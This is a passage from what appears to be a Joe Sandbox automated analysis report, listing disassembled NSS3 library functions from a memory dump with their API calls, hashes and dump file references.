                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A0196B5F022205FDE70EFA4AE0DB493778670631DF944535E609A6B41DBAD9108C7D2
                                                                                                                                                                                                                                                                                          Function 6C792E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C793046
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C77EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C77EE85
                                                                                                                                                                                                                                                                                          • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C767FFB), ref: 6C79312A
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C793154
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C792E8B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C77F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C769BFF,?,00000000,00000000), ref: 6C77F134
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(8B3C75C0,?,6C767FFA), ref: 6C792EA4
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C79317B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Error$memcpy$K11_Value
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2334702667-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a944a029e03b98214ad7ad44d77cc530ca2a3d2d58c0e6dbe13f9ae1bd740c16
                                                                                                                                                                                                                                                                                          • Instruction ID: 041bdabfcccc5166567836491926c98b352c3118dde7b869b504b65bfcc3c9a3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a944a029e03b98214ad7ad44d77cc530ca2a3d2d58c0e6dbe13f9ae1bd740c16
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BA1CF71A002189FDB24CF54DD84BEAB7B6EF45308F0480A9ED4967741E771AD45CFA1
                                                                                                                                                                                                                                                                                          Function 6C75ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C75ED6B
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000000), ref: 6C75EDCE
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750BE0: malloc.MOZGLUE(6C748D2D,?,00000000,?), ref: 6C750BF8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750BE0: TlsGetValue.KERNEL32(6C748D2D,?,00000000,?), ref: 6C750C15
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?,6C75B04F), ref: 6C75EE46
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C75EECA
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C75EEEA
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C75EEFB
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3768380896-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 15518b8c6913a1c667b7d4d06c026c4d438e209ea6f170b6699c3f4228eab96f
                                                                                                                                                                                                                                                                                          • Instruction ID: 02c86438342db48c9ba896c09b148d27d0f7b5535f471c0b93316399a218686d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15518b8c6913a1c667b7d4d06c026c4d438e209ea6f170b6699c3f4228eab96f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8816CB1A002099FEB14CF55DA85BABB7F9AF88308F544438E81597751DB35E824CBE1
                                                                                                                                                                                                                                                                                          Function 6C75CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C75C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C75DAE2,?), ref: 6C75C6C2
                                                                                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C75CD35
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C800A27), ref: 6C7B9DC6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C800A27), ref: 6C7B9DD1
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7B9DED
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C746C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C6F1C6F,00000000,00000004,?,?), ref: 6C746C3F
                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C75CD54
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9BF0: TlsGetValue.KERNEL32(?,?,?,6C800A75), ref: 6C7B9C07
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C747260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C6F1CCC,00000000,00000000,?,?), ref: 6C74729F
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C75CD9B
                                                                                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C75CE0B
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C75CE2C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C7510F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: EnterCriticalSection.KERNEL32(?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75110C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751141
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PR_Unlock.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75119C
                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C75CE40
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: TlsGetValue.KERNEL32 ref: 6C7514E0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: EnterCriticalSection.KERNEL32 ref: 6C7514F5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: PR_Unlock.NSS3 ref: 6C75150D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C75CEE0: PORT_ArenaMark_Util.NSS3(?,6C75CD93,?), ref: 6C75CEEE
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C75CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C75CD93,?), ref: 6C75CEFC
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C75CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C75CD93,?), ref: 6C75CF0B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C75CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C75CD93,?), ref: 6C75CF1D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C75CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C75CD93,?), ref: 6C75CF47
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C75CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C75CD93,?), ref: 6C75CF67
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C75CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C75CD93,?,?,?,?,?,?,?,?,?,?,?,6C75CD93,?), ref: 6C75CF78
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3748922049-0
                                                                                                                                                                                                                                                                                          • Opcode ID: eb319e12b3c44708561e84b94f47bb63c1a963adaa15679ff5c127b776f1bc02
                                                                                                                                                                                                                                                                                          • Instruction ID: 3f248fd2b99e4a6a64ce57cb8411c121deaa6e944ce101033a123f8f6c658280
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb319e12b3c44708561e84b94f47bb63c1a963adaa15679ff5c127b776f1bc02
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4519F76B002049BEB10EF69DE48BAA73E8AF4C349F650534D954A7740EF31E925CB91
                                                                                                                                                                                                                                                                                          Function 6C76FFD0 Relevance: 9.1, APIs: 6, Instructions: 132COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFD076,00000000), ref: 6C76FFE5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C770004
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C77001B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: EnterMonitor$ErrorValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3413098822-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 37be0b9d6d7f3ebc03133ab1eb4924afe79693f1e2114b0676d1fb78100bbf19
                                                                                                                                                                                                                                                                                          • Instruction ID: 780fad546695c9b52426777f51f3b857267bfdf420429959e34d102b39ed1716
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37be0b9d6d7f3ebc03133ab1eb4924afe79693f1e2114b0676d1fb78100bbf19
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 184179752446888BEF304A28DE597AF72A1DB4138CF10043DD44BCAF91E7BBA849C662
                                                                                                                                                                                                                                                                                          Function 6C72EEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C72EF38
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C719520: PK11_IsLoggedIn.NSS3(00000000,?,6C74379E,?,00000001,?), ref: 6C719542
                                                                                                                                                                                                                                                                                          • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C72EF53
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C734C20: TlsGetValue.KERNEL32 ref: 6C734C4C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C734C20: EnterCriticalSection.KERNEL32(?), ref: 6C734C60
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C734C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C734CA1
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C734C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C734CBE
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C734C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C734CD2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C734C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C734D3A
                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C72EF9E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9BF0: TlsGetValue.KERNEL32(?,?,?,6C800A75), ref: 6C7B9C07
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C72EFC3
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C72F016
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C72F022
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2459274275-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 32976eac40e1c2b7b31c042949841bd36142abfb20a950045553c5952740ed39
                                                                                                                                                                                                                                                                                          • Instruction ID: 076d86f2432c9d60bb603f132e75c0bf6c33cb327998130f165815ea08f23927
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32976eac40e1c2b7b31c042949841bd36142abfb20a950045553c5952740ed39
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED41B3B1E00209AFDF118FA9DD48BEEBBB9AF48358F044035F914A6351E776C915CBA1
                                                                                                                                                                                                                                                                                          Function 6C71CF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000060), ref: 6C71CF80
                                                                                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6C71D002
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C71D016
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C71D025
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C71D043
                                                                                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C71D074
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3361105336-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 0fe131f2100c598d707c4ff90adc10bd2bf1ff3fb17249d42739d8f3d99ac5e8
                                                                                                                                                                                                                                                                                          • Instruction ID: 9b652229a7029159f632fa9c9503951b1fd8961a30684be51fe1b0dd25f91101
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fe131f2100c598d707c4ff90adc10bd2bf1ff3fb17249d42739d8f3d99ac5e8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3841E1B1A053118FDB11DF29CA8879A7BA4EF18319F18817ADC188BF42D770D485CFA5
                                                                                                                                                                                                                                                                                          Function 6C763FD0 Relevance: 9.1, APIs: 6, Instructions: 106memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C763FF2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: TlsGetValue.KERNEL32 ref: 6C7514E0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: EnterCriticalSection.KERNEL32 ref: 6C7514F5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: PR_Unlock.NSS3 ref: 6C75150D
                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C764001
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000074), ref: 6C76400F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C7510F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: EnterCriticalSection.KERNEL32(?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75110C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751141
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PR_Unlock.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75119C
                                                                                                                                                                                                                                                                                          • CERT_CertChainFromCert.NSS3(?,00000004,00000000), ref: 6C764054
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6FBB90: PORT_NewArena_Util.NSS3(00001000), ref: 6C6FBC24
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6FBB90: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C6FBC39
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6FBB90: PORT_ArenaAlloc_Util.NSS3(00000000), ref: 6C6FBC58
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6FBB90: SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C6FBCBE
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C764070
                                                                                                                                                                                                                                                                                          • NSS_CMSSignedData_Destroy.NSS3(00000000), ref: 6C7640CD
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_Value$CertCriticalEnterMark_SectionUnlock$AllocateArena_ChainCopyData_DestroyErrorFromItem_Signed
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3882640887-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
                                                                                                                                                                                                                                                                                          • Instruction ID: 003ac34c7cc75d5032daf8af775c83859488e682e8e259b1f1070c3232b9ab18
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D310572E0035097EB00CF659E85BBB3364AF9070CF145274ED489BB46FB31E968C692
                                                                                                                                                                                                                                                                                          Function 6C702E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C6F2D1A), ref: 6C702E7E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7507B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C6F8298,?,?,?,6C6EFCE5,?), ref: 6C7507BF
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7507B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7507E6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C75081B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C750825
                                                                                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C702EDF
                                                                                                                                                                                                                                                                                          • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C702EE9
                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C6F2D1A), ref: 6C702F01
                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C6F2D1A), ref: 6C702F50
